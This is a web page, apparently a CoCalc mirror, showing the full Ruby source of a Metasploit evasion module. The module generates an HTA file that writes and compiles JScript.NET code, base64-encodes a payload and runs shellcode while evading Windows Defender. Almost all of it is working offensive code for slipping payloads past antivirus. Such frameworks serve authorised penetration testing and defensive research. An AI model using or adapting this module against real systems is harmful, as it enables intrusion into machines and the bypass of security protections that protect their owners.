CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/evasion/windows/windows_defender_js_hta.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Evasion

7


8
  def initialize(info={})

9
    super(merge_info(info,

10
      'Name'        =>  'Microsoft Windows Defender Evasive JS.Net and HTA',

11
      'Description' =>  %q{

12
        This module will generate an HTA file that writes and compiles a JScript.NET file

13
        containing shellcode on the target machine. After compilation, the generated EXE will

14
        execute the shellcode without interference from Windows Defender.

15


16
        It is recommended that you use a payload that uses RC4 or HTTPS for best experience.

17
      },

18
      'Author'      =>

19
        [

20
          'sinmygit',    # PoC

21
          'Shelby Pace'  # Metasploit Module

22
        ],

23
      'License'     =>  MSF_LICENSE,

24
      'Platform'    =>  'win',

25
      'Arch'        =>  ARCH_X64,

26
      'Targets'     =>  [ [ 'Microsoft Windows', {} ] ]

27
    ))

28


29
    register_options([

30
      OptString.new(

31
        'FILENAME',

32
          [

33
            true,

34
            'Filename for the evasive file (default: random)',

35
            "#{Rex::Text.rand_text_alpha(3..10)}.hta"

36
          ])

37
    ])

38
  end

39


40
  def run

41
    # This is used in the ERB template

42
    file_payload = Rex::Text.encode_base64(payload.encoded)

43
    evasion_shellcode_path = File.join(Msf::Config.data_directory, 'exploits', 'evasion_shellcode.js')

44
    jsnet_code = File.read(evasion_shellcode_path)

45
    fail_with(Failure::NotFound, 'The JScript.NET file was not found.') unless File.exist?(evasion_shellcode_path)

46
    js_file = ERB.new(jsnet_code).result(binding())

47
    jsnet_encoded = Rex::Text.encode_base64(js_file)

48
    # This is used in the ERB template

49
    fname = Rex::Text.rand_text_alpha(6)

50
    arch = ["x86", "x64"].include?(payload.arch.first) ? payload.arch.first : "anycpu"

51
    hta_path = File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta')

52
    hta = File.read(hta_path)

53
    fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exist?(hta_path)

54
    hta_file = ERB.new(hta).result(binding())

55
    file_create(hta_file)

56
  end

57
end

58


59